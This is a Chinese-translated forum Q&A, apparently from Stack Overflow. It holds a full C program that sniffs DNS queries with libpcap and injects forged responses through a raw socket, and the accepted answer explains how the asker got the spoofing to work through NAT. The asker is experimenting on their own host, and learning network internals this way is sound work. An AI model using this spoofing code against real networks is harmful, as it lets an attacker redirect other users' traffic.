无法通过DNS欺骗来欺骗主机命令

时间:2013-05-09 10:39:14

标签: c linux sockets dns spoofing

我最近发现原始套接字,我目前正在尝试捕获带有host命令发送的DNS数据包(带有libcap库),并在DNS服务器之前用错误的地址回复它。不幸的是,它似乎不起作用...我可以看到我的数据包与tcpdump但它没有传递给主机命令。这是我用于测试的代码:

#include <arpa/inet.h>
#include <netpacket/packet.h>
#include <net/ethernet.h>
#include <net/if.h>

#include <sys/socket.h>
#include <sys/types.h>
#include <linux/if_ether.h>
#include <linux/ip.h>
#include <linux/tcp.h>
#include <linux/udp.h>

typedef unsigned int u_int;
typedef unsigned short u_short;
typedef unsigned char u_char;

#include <pcap/pcap.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

struct dnshdr {
    uint16_t id;
    uint16_t flags;
    uint16_t nquestion;
    uint16_t nanswer;
    uint16_t nauthority;
    uint16_t nadditional;
};

struct msg {
    struct ethhdr eth;
    struct iphdr ip;
    struct udphdr udp;
    struct dnshdr dns;
    unsigned char * data;
    size_t dlen;
};

static void msg_init(uint8_t *, struct pcap_pkthdr const *, uint8_t const *);
static void msg_to_pkt(struct msg *, unsigned char *);
static uint16_t msg_len(struct msg *);
static struct msg * msg_cap(void);


static void
msg_init(uint8_t * msg, struct pcap_pkthdr const * h, uint8_t const * bytes)
{
    struct msg * self;
    size_t offset;

    self = (struct msg *)msg;
    offset = 0;
    memcpy(&self->eth, bytes + offset, sizeof self->eth);
    offset += sizeof self->eth;
    memcpy(&self->ip, bytes + offset, sizeof self->ip);
    offset += self->ip.ihl * 4;
    memcpy(&self->udp, bytes + offset, sizeof self->udp);
    offset += sizeof self->udp;
    memcpy(&self->dns, bytes + offset, sizeof self->dns);
    offset += sizeof self->dns;
    self->dlen = h->len - offset;
    self->data = malloc(self->dlen);
    if (self->data == NULL) {
        perror("malloc");
        free(self);
        exit(EXIT_FAILURE);
    }
    memcpy(self->data, bytes + offset, self->dlen); 
}


static void
msg_to_pkt(struct msg * self, unsigned char * pkt)
{
    memcpy(pkt, &self->eth, sizeof self->eth);
    pkt += sizeof self->eth;
    memcpy(pkt, &self->ip, sizeof self->ip);
    pkt += sizeof self->ip;
    memcpy(pkt, &self->udp, sizeof self->udp);
    pkt += sizeof self->udp;
    memcpy(pkt, &self->dns, sizeof self->dns);
    pkt += sizeof self->dns;
    memcpy(pkt, self->data, self->dlen);
}


static uint16_t
msg_len(struct msg * self)
{
    uint16_t len;

    len = 0;
    len += sizeof self->eth;
    len += sizeof self->ip;
    len += sizeof self->udp;
    len += sizeof self->dns;
    len += self->dlen;
    return len;
}


static struct msg *
msg_cap(void)
{
    struct bpf_program filter;
    pcap_t * p;
    void * msg;
    char errbuf[PCAP_ERRBUF_SIZE];

    p = pcap_create("eth0", errbuf);
    if (p == NULL) {
        pcap_perror(p, "pcap_create");
        return NULL;
    }
    if (pcap_activate(p) < 0) {
        pcap_perror(p, "pcap_activate");
        return NULL;
    }
    if (pcap_compile(p, &filter, "dst port 53 and udp", 1,
    PCAP_NETMASK_UNKNOWN) < 0) {
        pcap_perror(p, "pcap_compile");
        return NULL;
    }
    if (pcap_setfilter(p, &filter) < 0) {
        pcap_perror(p, "pcap_setfilter");
        return NULL;
    }
    msg = malloc(sizeof (struct msg));
    if (msg == NULL) {
        perror("malloc");
        return NULL;
    }
    if (pcap_loop(p, 1, &msg_init, msg) < 0) {
        pcap_perror(p, "pcap_loop");
        free(msg);
        return NULL;
    }
    return msg;
}


uint16_t
cksum(void const * buf, size_t nbytes)
{
    uint32_t cs = 0;
    uint16_t const * p;

    p = buf;
    while (nbytes > 1) {
        cs += *p++;
        nbytes -= 2;
    }
    if (nbytes == 1) {
        cs += *(uint8_t *)p;
    }
    while ((cs >> 16) != 0) {
        cs = (cs & 0xFFFF) + (cs >> 16);
    }
    return ~(uint16_t)cs;
}


int
main(void)
{
    struct msg * msg;
    struct sockaddr_ll sll;
    char resp[] = "\xc0\x0c\0\1\0\1\0\0\x02\x65\0\4\x7f\0\0\1";
    char ethaddr[ETH_ALEN];
    unsigned char * tmp;
    size_t const rlen = sizeof resp - 1;
    size_t mlen;
    uint32_t ipaddr;
    uint16_t port;
    int s;

    s = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);
    if (s < 0) {
        perror("socket");
        return EXIT_FAILURE;
    }
    msg = msg_cap();
    if (msg == NULL) {
        return EXIT_FAILURE;
    }

    /* add DNS response */
    tmp = malloc(msg->dlen + rlen);
    if (tmp == NULL) {
        perror("malloc");
        return EXIT_FAILURE;
    }
    memcpy(tmp, msg->data, msg->dlen);
    memcpy(tmp + msg->dlen, resp, rlen);
    free(msg->data);
    msg->data = tmp;
    msg->dlen += rlen;
    mlen = msg_len(msg);

    /* reverse Ethernet address */
    memcpy(ethaddr, msg->eth.h_dest, ETH_ALEN);
    memcpy(msg->eth.h_dest, msg->eth.h_source, ETH_ALEN);
    memcpy(msg->eth.h_source, ethaddr, ETH_ALEN);

    /* reverse IP address and change some fields */
    ipaddr = msg->ip.daddr;
    msg->ip.daddr = msg->ip.saddr;
    msg->ip.saddr = ipaddr;
    msg->ip.tos = 0;
    msg->ip.ttl = 53;
    msg->ip.id = htons(9999);
    msg->ip.tot_len = htons(mlen - sizeof msg->eth);
    msg->ip.check = 0;
    msg->ip.check = cksum(&msg->ip, sizeof msg->ip);

    /* reverse UDP ports and change some fields */
    port = msg->udp.dest;
    msg->udp.dest = msg->udp.source;
    msg->udp.source = port;
    msg->udp.len = htons(mlen - sizeof msg->eth - sizeof msg->ip);
    msg->udp.check = 0;

    /* change DNS flags and nanswer fields */
    msg->dns.flags = htons(0x8180);
    msg->dns.nanswer = htons(1);

    /* alloc buffer and send the packet */
    tmp = malloc(mlen);
    if (tmp == NULL) {
        perror("malloc");
        return EXIT_FAILURE;
    }
    msg_to_pkt(msg, tmp);
    sll.sll_family = AF_PACKET;
    sll.sll_protocol = htons(ETH_P_IP);
    sll.sll_ifindex = if_nametoindex("eth0");
    sll.sll_hatype = 1;
    sll.sll_pkttype = PACKET_HOST;
    sll.sll_halen = ETH_ALEN;
    memcpy(&sll.sll_addr, msg->eth.h_dest, ETH_ALEN);
    if (sendto(s, tmp, mlen, 0, (struct sockaddr *)&sll, sizeof sll) < 0) {
        perror("sendto");
        return EXIT_FAILURE;
    }
    close(s);
    return 0;
}

它有什么问题吗?

1 个答案:

答案 0 :(得分:0)

好的,经过一些进一步的测试和头痛,我终于找到了问题的根源。事实上,有两个问题。

首先,我想当sll_pkttype字段设置为PACKET_HOST时,意味着数据包被发送到localhost。但是,在回读数据包(7)之后,似乎该字段仅在接收数据包时使用。换句话说,我的数据包被发送到我的路由器并因为MAC目标地址错误而被丢弃。

接下来,即使我正在更改MAC目标地址,数据包也没有从我的路由器发送回我的计算机。这是一个NAPT问题。因为我捕获的数据包在我的路由器的NAT表中打开UDP会话,所以我不可能发送一个包含我的计算机地址的数据包作为目标IP地址和与NAT中保存的目标端口相同的目标端口表。所以,我将目标地址更改为路由器的外部地址,这样就可以了!